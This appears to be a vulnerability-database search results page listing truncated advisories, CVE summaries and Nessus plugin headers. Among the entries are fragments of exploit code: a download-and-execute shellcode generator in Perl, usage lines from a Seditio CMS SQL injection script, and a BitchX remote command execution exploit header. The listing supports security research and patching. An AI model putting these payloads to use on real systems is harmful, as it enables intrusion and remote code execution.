2293 matches found
CVE-2008-2364
The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim...
FreeBSD : spamdyke -- open relay (555ac165-2bee-11dd-bbdc-00e0815b8da8)
Spamdyke Team reports: Fixed smtpfilter to reject the DATA command if no valid recipients have been specified. Otherwise, a specific scenario could result in every spamdyke installation being used as an open relay. If the remote server connects and gives one or more recipients that are rejected...
PHP 5.x < 5.2 Multiple Vulnerabilities
According to its banner, the version of PHP 5.x installed on the remote host is older than 5.2. Such versions may be affected by several buffer overflows. To exploit these issues, an attacker would need the ability to upload an arbitrary PHP script on the remote server or to manipulate several...
win32 Download and Execute Shellcode Generator (browsers edition)
No description provided by source. !/usr/bin/perl $loadingurl=$ARGV0; chomp $loadingurl; my @buffer; if $loadingurl eq "" $sco = 'ERROR!!! Enter url to remote exe.'; buffergen$sco; print @buffer; exit; $c= generatechar0; $sco= "\xE8\x56\x00\x00\x00\x53\x55\x56\x57\x8B\x6C\x24\x18\x8B\x45"...
[SECURITY] Fedora 8 Update: duplicity-0.4.9-1.fc8
Duplicity incrementally backs up files and directories by encrypting tar-format volumes with GnuPG and uploading them to a remote or local file server. In theory many protocols for connecting to a file server could be supported; so far ssh/scp, local file access, rsync, ftp, HSI, WebDAV and Amazon ...
MS08-003: Vulnerability in Active Directory Could Allow Denial of Service (946538)
The remote version of Active Directory contains a flaw in the LDAP request handler code that allows an attacker to crash the remote Active Directory server. C Tenable Network Security, Inc. include"compat.inc"; if description scriptid31037; scriptversion"1.28"; scriptcvsdate"Date: 2018/11/15...
Hewlett-Packard OpenView Network Node Manager Multiple CGI Buffer Overflow Vulnerabilities
These vulnerabilities allow remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard (HP) OpenView Network Node Manager (NNM). Authentication is not required to exploit these vulnerabilities. The specific flaws exist within the CGI applications that handle the...
CVE-2007-5355
The Web Proxy Auto-Discovery (WPAD) feature in Microsoft Internet Explorer 6 and 7, when a primary DNS suffix with three or more components is configured, resolves an unqualified wpad hostname in a second-level domain outside this configured DNS domain, which allows remote WPAD servers to conduct...
Seditio CMS 121 - SQL Injection
= 4.1, magic_quotes_gpc=Off echo "------------------------------------------------------------\n"; echo "Seditio CMS - use specific prefix default sed\n"; echo "-id= - use specific user id default 1\n\n"; echo "examples:\n"; echo "php $argv[0] http://site.com/ -p=cms\n"; echo "php $argv[0]...
smf-blind.txt
SMF is a very hardened PHP application. If anyone wants an example of some interesting PHP security, SMF is a good place to look. Even after being able to inject SQL I had to take another step and bypass some difficult filters found in the db_query function. Ultimately I was able to do so. This...
FTP protocol PASV design flaw affects konqueror
The FTP protocol implementation in Konqueror 3.5.5 allows remote servers to force the client to connect to other servers, perform a proxied port scan, or obtain sensitive information by specifying an alternate server address in an FTP PASV response...
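Microsoft Internet Explorer File Upload Handling Vulnerability
BUGTRAQ ID: 25836 Internet Explorer is a very popular web browser released by Microsoft. Internet Explorer has a vulnerability in the way it handles file uploads, which a malicious website may exploit to steal files from the user's system. Normally, because of security restrictions, JavaScript is not allowed to set focus on, or set a value in, a file upload field, to prevent arbitrary files from being uploaded from the user's machine. Browser vendors enforce this restriction on the file field of forms, so that a file can be uploaded only if the computer user has selected it. However, if a user visits a malicious web page with IE, the page may steal the user's focus, bypass the browser security restriction, and upload arbitrary files to a remote server without the user's knowledge. Microsoft Internet Explorer 6.0 SP1...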
Web Server Transmits Cleartext Credentials
The remote web server contains several HTML form fields containing an input of type 'password' which transmit their information to a remote web server in cleartext. An attacker eavesdropping the traffic between web browser and server may obtain logins and passwords of valid users. C Tenable Netwo...
Design/Logic Flaw
Interpretation conflict in WinSCP before 4.0.4 allows remote attackers to perform arbitrary file transfers with a remote server via file-transfer commands in the final portion of a (1) scp, and possibly a (2) sftp or (3) ftp, URL, as demonstrated by a URL specifying login to the remote server with a...
CVE-2007-4909
WinSCP (before 4.0.4) is affected by an interpretation conflict in its URL handler that lets remote attackers perform arbitrary file transfers via certain scp/sftp/ftp URLs, by abusing a login-as-username on the URL which is parsed differently by the protocol handler. The issue is described as a ...
CVE-2007-4625
Polipo before 1.0.2 allows remote HTTP servers to cause a denial of service (daemon crash) by aborting the response to a POST request...
Buffer overflow
Multiple buffer overflows in the client in Toribash 2.71 and earlier allow remote attackers to (1) execute arbitrary code via a long game command in a replay .rpl file and (2) cause a denial of service (application crash) via a long SAY command that omits a required LF character; and allow remote...
BitchX 1.1-final (EXEC) Remote Command Execution Exploit
No description provided by source. / Name: PBXS - Pointless BitchX Sploit Author: clarity Infected Versions: 1.1-final and others? Synopsis: BitchX suffers from an unchecked bounds in a hash table in hook.c where one can inject data structures allowing for the remote execution of commands! Usage:...
[SECURITY] Fedora Core 6 Update: postgresql-8.1.9-1.fc6
PostgreSQL is an advanced Object-Relational database management system (DBMS) that supports almost all SQL constructs including transactions, subselects and user-defined types and functions. The postgresql package includes the client programs and libraries that you'll need to access a PostgreSQL DB...
OS Identification : SNMP
Nessus was able to identify the operating system type and version by examining the SNMP data returned by the remote server. C Tenable, Inc. include"compat.inc"; if descripti...